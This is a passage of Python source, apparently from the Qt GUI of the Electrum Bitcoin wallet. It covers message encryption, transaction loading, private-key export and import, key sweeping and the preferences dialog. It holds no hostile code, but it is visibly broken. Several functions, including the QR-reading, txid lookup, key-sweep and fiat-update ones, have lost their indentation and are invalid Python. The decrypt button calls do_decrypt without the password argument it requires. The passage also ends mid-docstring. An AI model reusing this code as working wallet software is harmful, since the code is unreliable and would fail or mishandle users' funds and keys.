def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
    """Decrypt the ciphertext in *encrypted_e* with the wallet key matching
    *pubkey_e* (on the wallet thread) and show the plaintext in *message_e*."""
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    cyphertext = encrypted_e.toPlainText()
    task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
    def setText(text):
        try:
            message_e.setText(text.decode('utf-8'))
        except RuntimeError:
            # (message_e) wrapped C/C++ object has been deleted
            pass
    self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
    """Encrypt the text in *message_e* to the public key in *pubkey_e* and
    show the result in *encrypted_e*."""
    message = message_e.toPlainText()
    message = message.encode('utf-8')
    try:
        public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
    except BaseException as e:
        self.logger.exception('Invalid Public key')
        self.show_warning(_('Invalid Public key'))
        return
    encrypted = public_key.encrypt_message(message)
    encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
    """Modal dialog for encrypting/decrypting a message with a public key;
    if *address* is given, its public key is prefilled."""
    d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
    d.setMinimumSize(610, 490)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    pubkey_e = QLineEdit()
    if address:
        pubkey = self.wallet.get_public_key(address)
        pubkey_e.setText(pubkey)
    layout.addWidget(QLabel(_('Public key')), 2, 0)
    layout.addWidget(pubkey_e, 2, 1)
    encrypted_e = QTextEdit()
    encrypted_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Encrypted')), 3, 0)
    layout.addWidget(encrypted_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Encrypt"))
    b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Decrypt"))
    b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
def password_dialog(self, msg=None, parent=None):
    """Prompt for the wallet password; returns it, or None if cancelled."""
    from .password_dialog import PasswordDialog
    dialog = PasswordDialog(parent or self, msg)
    return dialog.run()
def tx_from_text(self, txt):
    """Parse *txt* into a Transaction; shows an error dialog and returns
    None if the text is not a valid transaction."""
    from electrum.transaction import tx_from_str
    try:
        tx = tx_from_str(txt)
        return Transaction(tx)
    except BaseException as e:
        self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
        return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
    """Ask for a .txn file and parse it; returns a Transaction or None."""
    fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
    if not fileName:
        return
    try:
        with open(fileName, "r") as f:
            file_content = f.read()
    except (ValueError, IOError, os.error) as reason:
        self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
        return
    return self.tx_from_text(file_content)
def do_process_from_text(self):
    """Let the user paste a raw transaction and display it."""
    text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
    if not text:
        return
    tx = self.tx_from_text(text)
    if tx:
        self.show_transaction(tx)
def do_process_from_file(self):
    """Load a transaction from a file and display it."""
    tx = self.read_tx_from_file()
    if tx:
        self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
    """Modal dialog that decrypts every private key in the wallet and
    exports them to a CSV/JSON file.

    Key derivation runs on a worker thread; two Qt signals
    (computing_privkeys_signal, show_privkeys_signal) marshal progress
    and completion back onto the GUI thread. The done/cancelled flags
    coordinate shutdown between the thread and the dialog.
    """
    if self.wallet.is_watching_only():
        self.show_message(_("This is a watching-only wallet"))
        return
    if isinstance(self.wallet, Multisig_Wallet):
        self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                          _('It cannot be "backed up" by simply exporting these private keys.'))
    d = WindowModalDialog(self, _('Private keys'))
    d.setMinimumSize(980, 300)
    vbox = QVBoxLayout(d)
    msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                          _("Exposing a single private key can compromise your entire wallet!"),
                          _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
    vbox.addWidget(QLabel(msg))
    e = QTextEdit()
    e.setReadOnly(True)
    vbox.addWidget(e)
    defaultname = 'electrum-private-keys.csv'
    select_msg = _('Select file to export your private keys to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    b = OkButton(d, _('Export'))
    b.setEnabled(False)  # enabled once all keys have been derived
    vbox.addLayout(Buttons(CancelButton(d), b))
    private_keys = {}
    addresses = self.wallet.get_addresses()
    done = False
    cancelled = False
    def privkeys_thread():
        # worker thread: derive one key at a time, emitting progress
        for addr in addresses:
            time.sleep(0.1)  # throttle so the GUI stays responsive
            if done or cancelled:
                break
            privkey = self.wallet.export_private_key(addr, password)[0]
            private_keys[addr] = privkey
            self.computing_privkeys_signal.emit()
        if not cancelled:
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.emit()
    def show_privkeys():
        # GUI thread: show the finished list and enable the Export button
        s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
        e.setText(s)
        b.setEnabled(True)
        self.show_privkeys_signal.disconnect()
        nonlocal done
        done = True
    def on_dialog_closed(*args):
        # stop the worker if the dialog is closed before completion
        nonlocal done
        nonlocal cancelled
        if not done:
            cancelled = True
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.disconnect()
    self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
    self.show_privkeys_signal.connect(show_privkeys)
    d.finished.connect(on_dialog_closed)
    threading.Thread(target=privkeys_thread).start()
    if not d.exec_():
        done = True
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
    except (IOError, os.error) as reason:
        txt = "\n".join([
            _("Electrum was unable to produce a private key-export."),
            str(reason)
        ])
        self.show_critical(txt, title=_("Unable to create csv"))
    except Exception as e:
        self.show_message(str(e))
        return
    self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
    """Write the {address: private_key} mapping *pklist* to *fileName*.

    CSV output starts with an "address,private_key" header row (addresses
    right-padded to 34 chars, matching the historical format); otherwise
    the mapping is dumped as indented JSON.
    """
    # newline='' lets the csv module control line endings itself; without
    # it, csv's own '\r\n' terminators get doubled to '\r\r\n' on Windows.
    with open(fileName, "w+", newline='') as f:
        if is_csv:
            writer = csv.writer(f)
            writer.writerow(["address", "private_key"])
            for addr, pk in pklist.items():
                writer.writerow(["%34s" % addr, pk])
        else:
            f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
    """Import wallet labels from a user-chosen file and refresh the GUI."""
    def import_labels(path):
        def _validate(data):
            return data # TODO
        def import_labels_assign(data):
            # apply each imported {txid/address: label} pair to the wallet
            for key, value in data.items():
                self.wallet.set_label(key, value)
        import_meta(path, _validate, import_labels_assign)
    def on_import():
        self.need_update.set()
    import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
    """Export all wallet labels to a user-chosen file."""
    def write_labels(filename):
        export_meta(self.wallet.labels, filename)
    export_meta_gui(self, _('labels'), write_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
    """Shared import flow: prompt for whitespace-separated keys, run *func*
    on them, and report which inputs succeeded or failed (first 10 each)."""
    text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
    if not text:
        return
    keys = str(text).split()
    good_inputs, bad_inputs = func(keys)
    if good_inputs:
        msg = '\n'.join(good_inputs[:10])
        if len(good_inputs) > 10: msg += '\n...'
        self.show_message(_("The following addresses were added")
                          + f' ({len(good_inputs)}):\n' + msg)
    if bad_inputs:
        msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
        if len(bad_inputs) > 10: msg += '\n...'
        self.show_error(_("The following inputs could not be imported")
                        + f' ({len(bad_inputs)}):\n' + msg)
    self.address_list.update()
    self.history_list.update()
def import_addresses(self):
    """Import watching-only addresses typed by the user, when supported."""
    if not self.wallet.can_import_address():
        return
    self._do_import(_('Import addresses'),
                    _("Enter addresses") + ':',
                    self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
    """Import private keys typed by the user (password-gated), when supported."""
    if not self.wallet.can_import_privkey():
        return
    title = _('Import private keys')
    header_layout = QHBoxLayout()
    header_layout.addWidget(QLabel(_("Enter private keys")+':'))
    header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
    """Build and run the modal Preferences dialog.

    Widgets are collected per tab (General / Fees / Transactions / Fiat /
    Identity), then laid out in a grid per tab.  Settings take effect
    immediately via their change callbacks; settings that need a restart
    set self.need_restart, which triggers a warning after the dialog closes.
    """
    self.need_restart = False
    d = WindowModalDialog(self, _('Preferences'))
    vbox = QVBoxLayout()
    tabs = QTabWidget()
    # (label, widget) pairs per tab; a None widget means "span both columns".
    gui_widgets = []
    fee_widgets = []
    tx_widgets = []
    id_widgets = []
    # language
    lang_help = _('Select which language is used in the GUI (after restart).')
    lang_label = HelpLabel(_('Language') + ':', lang_help)
    lang_combo = QComboBox()
    from electrum.i18n import languages
    lang_combo.addItems(list(languages.values()))
    lang_keys = list(languages.keys())
    lang_cur_setting = self.config.get("language", '')
    try:
        index = lang_keys.index(lang_cur_setting)
    except ValueError:  # current setting not in the known-languages list
        index = 0
    lang_combo.setCurrentIndex(index)
    if not self.config.is_modifiable('language'):
        for w in [lang_combo, lang_label]: w.setEnabled(False)
    def on_lang(x):
        lang_request = list(languages.keys())[lang_combo.currentIndex()]
        if lang_request != self.config.get('language'):
            self.config.set_key("language", lang_request, True)
            # language only applies after restart
            self.need_restart = True
    lang_combo.currentIndexChanged.connect(on_lang)
    gui_widgets.append((lang_label, lang_combo))
    # number of zeros shown after the decimal point
    nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
    nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
    nz = QSpinBox()
    nz.setMinimum(0)
    nz.setMaximum(self.decimal_point)
    nz.setValue(self.num_zeros)
    if not self.config.is_modifiable('num_zeros'):
        for w in [nz, nz_label]: w.setEnabled(False)
    def on_nz():
        value = nz.value()
        if self.num_zeros != value:
            self.num_zeros = value
            self.config.set_key('num_zeros', value, True)
            self.history_list.update()
            self.address_list.update()
    nz.valueChanged.connect(on_nz)
    gui_widgets.append((nz_label, nz))
    # fee estimation method
    msg = '\n'.join([
        _('Time based: fee rate is based on average confirmation time estimates'),
        _('Mempool based: fee rate is targeting a depth in the memory pool')
        ]
    )
    fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
    fee_type_combo = QComboBox()
    fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
    # index mapping: 0 = static, 1 = ETA (dynamic), 2 = mempool (dynamic)
    fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
    def on_fee_type(x):
        self.config.set_key('mempool_fees', x==2)
        self.config.set_key('dynamic_fees', x>0)
        self.fee_slider.update()
    fee_type_combo.currentIndexChanged.connect(on_fee_type)
    fee_widgets.append((fee_type_label, fee_type_combo))
    # manual fee edit box
    feebox_cb = QCheckBox(_('Edit fees manually'))
    feebox_cb.setChecked(self.config.get('show_fee', False))
    feebox_cb.setToolTip(_("Show fee edit box in send tab."))
    def on_feebox(x):
        self.config.set_key('show_fee', x == Qt.Checked)
        self.fee_adv_controls.setVisible(bool(x))
    feebox_cb.stateChanged.connect(on_feebox)
    fee_widgets.append((feebox_cb, None))
    # Replace-By-Fee
    use_rbf = self.config.get('use_rbf', True)
    use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
    use_rbf_cb.setChecked(use_rbf)
    use_rbf_cb.setToolTip(
        _('If you check this box, your transactions will be marked as non-final,') + '\n' + \
        _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
        _('Note that some merchants do not accept non-final transactions until they are confirmed.'))
    def on_use_rbf(x):
        self.config.set_key('use_rbf', bool(x))
        # batch_rbf_cb is defined just below; this closure runs on user
        # interaction, after the whole dialog has been built.
        batch_rbf_cb.setEnabled(bool(x))
    use_rbf_cb.stateChanged.connect(on_use_rbf)
    fee_widgets.append((use_rbf_cb, None))
    batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
    batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
    batch_rbf_cb.setEnabled(use_rbf)
    batch_rbf_cb.setToolTip(
        _('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
        _('This will save fees.'))
    def on_batch_rbf(x):
        self.config.set_key('batch_rbf', bool(x))
    batch_rbf_cb.stateChanged.connect(on_batch_rbf)
    fee_widgets.append((batch_rbf_cb, None))
    # OpenAlias identity
    msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
          + _('The following alias providers are available:') + '\n'\
          + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
          + 'For more information, see https://openalias.org'
    alias_label = HelpLabel(_('OpenAlias') + ':', msg)
    alias = self.config.get('alias','')
    alias_e = QLineEdit(alias)
    def set_alias_color():
        # green = alias resolved and validated; red = unresolved/invalid
        if not self.config.get('alias'):
            alias_e.setStyleSheet("")
            return
        if self.alias_info:
            alias_addr, alias_name, validated = self.alias_info
            alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
        else:
            alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
    def on_alias_edit():
        alias_e.setStyleSheet("")
        alias = str(alias_e.text())
        self.config.set_key('alias', alias, True)
        if alias:
            # async resolution; alias_received_signal recolors the field
            self.fetch_alias()
    set_alias_color()
    self.alias_received_signal.connect(set_alias_color)
    alias_e.editingFinished.connect(on_alias_edit)
    id_widgets.append((alias_label, alias_e))
    # SSL certificate
    msg = ' '.join([
        _('SSL certificate used to sign payment requests.'),
        _('Use setconfig to set ssl_chain and ssl_privkey.'),
    ])
    if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
        try:
            SSL_identity = paymentrequest.check_ssl_config(self.config)
            SSL_error = None
        except BaseException as e:
            SSL_identity = "error"
            SSL_error = str(e)
    else:
        SSL_identity = ""
        SSL_error = None
    SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
    SSL_id_e = QLineEdit(SSL_identity)
    SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
    if SSL_error:
        SSL_id_e.setToolTip(SSL_error)
    SSL_id_e.setReadOnly(True)
    id_widgets.append((SSL_id_label, SSL_id_e))
    # base unit (BTC / mBTC / bits / sat)
    units = base_units_list
    msg = (_('Base unit of your wallet.')
           + '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
           + _('This setting affects the Send tab, and all balance related fields.'))
    unit_label = HelpLabel(_('Base unit') + ':', msg)
    unit_combo = QComboBox()
    unit_combo.addItems(units)
    unit_combo.setCurrentIndex(units.index(self.base_unit()))
    def on_unit(x, nz):
        unit_result = units[unit_combo.currentIndex()]
        if self.base_unit() == unit_result:
            return
        # preserve the entered amounts across the unit change
        edits = self.amount_e, self.fee_e, self.receive_amount_e
        amounts = [edit.get_amount() for edit in edits]
        self.decimal_point = base_unit_name_to_decimal_point(unit_result)
        self.config.set_key('decimal_point', self.decimal_point, True)
        nz.setMaximum(self.decimal_point)
        self.history_list.update()
        self.request_list.update()
        self.address_list.update()
        for edit, amount in zip(edits, amounts):
            edit.setAmount(amount)
        self.update_status()
    unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
    gui_widgets.append((unit_label, unit_combo))
    # block explorer
    block_explorers = sorted(util.block_explorer_info().keys())
    msg = _('Choose which online block explorer to use for functions that open a web browser')
    block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
    block_ex_combo = QComboBox()
    block_ex_combo.addItems(block_explorers)
    block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
    def on_be(x):
        be_result = block_explorers[block_ex_combo.currentIndex()]
        self.config.set_key('block_explorer', be_result, True)
    block_ex_combo.currentIndexChanged.connect(on_be)
    gui_widgets.append((block_ex_label, block_ex_combo))
    # QR-scanner video device
    from electrum import qrscanner
    system_cameras = qrscanner._find_system_cameras()
    qr_combo = QComboBox()
    qr_combo.addItem("Default","default")
    for camera, device in system_cameras.items():
        qr_combo.addItem(camera, device)
    #combo.addItem("Manually specify a device", config.get("video_device"))
    index = qr_combo.findData(self.config.get("video_device"))
    qr_combo.setCurrentIndex(index)
    msg = _("Install the zbar package to enable this.")
    qr_label = HelpLabel(_('Video Device') + ':', msg)
    # greyed out when libzbar is not installed
    qr_combo.setEnabled(qrscanner.libzbar is not None)
    on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
    qr_combo.currentIndexChanged.connect(on_video_device)
    gui_widgets.append((qr_label, qr_combo))
    # color theme (requires restart)
    colortheme_combo = QComboBox()
    colortheme_combo.addItem(_('Light'), 'default')
    colortheme_combo.addItem(_('Dark'), 'dark')
    index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
    colortheme_combo.setCurrentIndex(index)
    colortheme_label = QLabel(_('Color theme') + ':')
    def on_colortheme(x):
        self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
        self.need_restart = True
    colortheme_combo.currentIndexChanged.connect(on_colortheme)
    gui_widgets.append((colortheme_label, colortheme_combo))
    # automatic update checks
    updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
    updatecheck_cb.setChecked(self.config.get('check_updates', False))
    def on_set_updatecheck(v):
        self.config.set_key('check_updates', v == Qt.Checked, save=True)
    updatecheck_cb.stateChanged.connect(on_set_updatecheck)
    gui_widgets.append((updatecheck_cb, None))
    # file logging (requires restart)
    filelogging_cb = QCheckBox(_("Write logs to file"))
    filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
    def on_set_filelogging(v):
        self.config.set_key('log_to_file', v == Qt.Checked, save=True)
        self.need_restart = True
    filelogging_cb.stateChanged.connect(on_set_filelogging)
    filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
    gui_widgets.append((filelogging_cb, None))
    # change-address policy
    usechange_cb = QCheckBox(_('Use change addresses'))
    usechange_cb.setChecked(self.wallet.use_change)
    if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
    def on_usechange(x):
        usechange_result = x == Qt.Checked
        if self.wallet.use_change != usechange_result:
            self.wallet.use_change = usechange_result
            self.wallet.storage.put('use_change', self.wallet.use_change)
            # multiple_cb is created below; this closure only runs on user input
            multiple_cb.setEnabled(self.wallet.use_change)
    usechange_cb.stateChanged.connect(on_usechange)
    usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
    tx_widgets.append((usechange_cb, None))
    def on_multiple(x):
        multiple = x == Qt.Checked
        if self.wallet.multiple_change != multiple:
            self.wallet.multiple_change = multiple
            self.wallet.storage.put('multiple_change', multiple)
    multiple_change = self.wallet.multiple_change
    multiple_cb = QCheckBox(_('Use multiple change addresses'))
    multiple_cb.setEnabled(self.wallet.use_change)
    multiple_cb.setToolTip('\n'.join([
        _('In some cases, use up to 3 change addresses in order to break '
          'up large coin amounts and obfuscate the recipient address.'),
        _('This may result in higher transactions fees.')
    ]))
    multiple_cb.setChecked(multiple_change)
    multiple_cb.stateChanged.connect(on_multiple)
    tx_widgets.append((multiple_cb, None))
    # coin (UTXO) selection method — only shown when more than one is available
    def fmt_docs(key, klass):
        lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
        return '\n'.join([key, "", " ".join(lines)])
    choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
    if len(choosers) > 1:
        chooser_name = coinchooser.get_name(self.config)
        msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
        msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
        chooser_label = HelpLabel(_('Coin selection') + ':', msg)
        chooser_combo = QComboBox()
        chooser_combo.addItems(choosers)
        i = choosers.index(chooser_name) if chooser_name in choosers else 0
        chooser_combo.setCurrentIndex(i)
        def on_chooser(x):
            chooser_name = choosers[chooser_combo.currentIndex()]
            self.config.set_key('coin_chooser', chooser_name)
        chooser_combo.currentIndexChanged.connect(on_chooser)
        tx_widgets.append((chooser_label, chooser_combo))
    # spend-only-confirmed-coins
    def on_unconf(x):
        self.config.set_key('confirmed_only', bool(x))
    conf_only = self.config.get('confirmed_only', False)
    unconf_cb = QCheckBox(_('Spend only confirmed coins'))
    unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
    unconf_cb.setChecked(conf_only)
    unconf_cb.stateChanged.connect(on_unconf)
    tx_widgets.append((unconf_cb, None))
    # output value rounding
    def on_outrounding(x):
        self.config.set_key('coin_chooser_output_rounding', bool(x))
    enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
    outrounding_cb = QCheckBox(_('Enable output value rounding'))
    outrounding_cb.setToolTip(
        _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
        _('This might improve your privacy somewhat.') + '\n' +
        _('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
    outrounding_cb.setChecked(enable_outrounding)
    outrounding_cb.stateChanged.connect(on_outrounding)
    tx_widgets.append((outrounding_cb, None))
    # Fiat Currency
    hist_checkbox = QCheckBox()
    hist_capgains_checkbox = QCheckBox()
    fiat_address_checkbox = QCheckBox()
    ccy_combo = QComboBox()
    ex_combo = QComboBox()
    # fiat helpers: each re-syncs one widget from self.fx state
    def update_currencies():
        if not self.fx: return
        currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
        ccy_combo.clear()
        ccy_combo.addItems([_('None')] + currencies)
        if self.fx.is_enabled():
            ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
    def update_history_cb():
        if not self.fx: return
        hist_checkbox.setChecked(self.fx.get_history_config())
        hist_checkbox.setEnabled(self.fx.is_enabled())
    def update_fiat_address_cb():
        if not self.fx: return
        fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
    def update_history_capgains_cb():
        if not self.fx: return
        hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
        hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
    def update_exchanges():
        if not self.fx: return
        b = self.fx.is_enabled()
        ex_combo.setEnabled(b)
        if b:
            h = self.fx.get_history_config()
            c = self.fx.get_currency()
            exchanges = self.fx.get_exchanges_by_ccy(c, h)
        else:
            exchanges = self.fx.get_exchanges_by_ccy('USD', False)
        # block signals so repopulating the combo doesn't fire on_exchange
        ex_combo.blockSignals(True)
        ex_combo.clear()
        ex_combo.addItems(sorted(exchanges))
        ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
        ex_combo.blockSignals(False)
    def on_currency(hh):
        if not self.fx: return
        # index 0 is the _('None') entry => fiat disabled
        b = bool(ccy_combo.currentIndex())
        ccy = str(ccy_combo.currentText()) if b else None
        self.fx.set_enabled(b)
        if b and ccy != self.fx.ccy:
            self.fx.set_currency(ccy)
        update_history_cb()
        update_exchanges()
        self.update_fiat()
    def on_exchange(idx):
        exchange = str(ex_combo.currentText())
        if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
            self.fx.set_exchange(exchange)
    def on_history(checked):
        if not self.fx: return
        self.fx.set_history_config(checked)
        update_exchanges()
        self.history_model.refresh('on_history')
        if self.fx.is_enabled() and checked:
            self.fx.trigger_update()
        update_history_capgains_cb()
    def on_history_capgains(checked):
        if not self.fx: return
        self.fx.set_history_capital_gains_config(checked)
        self.history_model.refresh('on_history_capgains')
    def on_fiat_address(checked):
        if not self.fx: return
        self.fx.set_fiat_address_config(checked)
        self.address_list.refresh_headers()
        self.address_list.update()
    # initialize the fiat widgets from the current state, then connect
    update_currencies()
    update_history_cb()
    update_history_capgains_cb()
    update_fiat_address_cb()
    update_exchanges()
    ccy_combo.currentIndexChanged.connect(on_currency)
    hist_checkbox.stateChanged.connect(on_history)
    hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
    fiat_address_checkbox.stateChanged.connect(on_fiat_address)
    ex_combo.currentIndexChanged.connect(on_exchange)
    fiat_widgets = []
    fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
    fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
    fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
    fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
    fiat_widgets.append((QLabel(_('Source')), ex_combo))
    # assemble tabs: each tab gets a 2-column grid of (label, widget) rows
    tabs_info = [
        (fee_widgets, _('Fees')),
        (tx_widgets, _('Transactions')),
        (gui_widgets, _('General')),
        (fiat_widgets, _('Fiat')),
        (id_widgets, _('Identity')),
    ]
    for widgets, name in tabs_info:
        tab = QWidget()
        grid = QGridLayout(tab)
        grid.setColumnStretch(0,1)
        for a,b in widgets:
            i = grid.rowCount()
            if b:
                if a:
                    grid.addWidget(a, i, 0)
                grid.addWidget(b, i, 1)
            else:
                # no second widget: span the row across both columns
                grid.addWidget(a, i, 0, 1, 2)
        tabs.addTab(tab, name)
    vbox.addWidget(tabs)
    vbox.addStretch(1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    # run the dialog
    d.exec_()
    if self.fx:
        self.fx.trigger_update()
    self.alias_received_signal.disconnect(set_alias_color)
    run_hook('close_settings_dialog')
    if self.need_restart:
        self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close hook.

    In some rare cases Qt delivers closeEvent twice; the cleaned_up flag
    guarantees clean_up() runs exactly once.
    """
    if self.cleaned_up:
        event.accept()
        return
    self.cleaned_up = True
    self.clean_up()
    event.accept()
def clean_up(self):
    """Persist window state and release resources during shutdown.

    Called exactly once (guarded by closeEvent).  Order matters: the wallet
    thread is stopped and network callbacks are unregistered before any
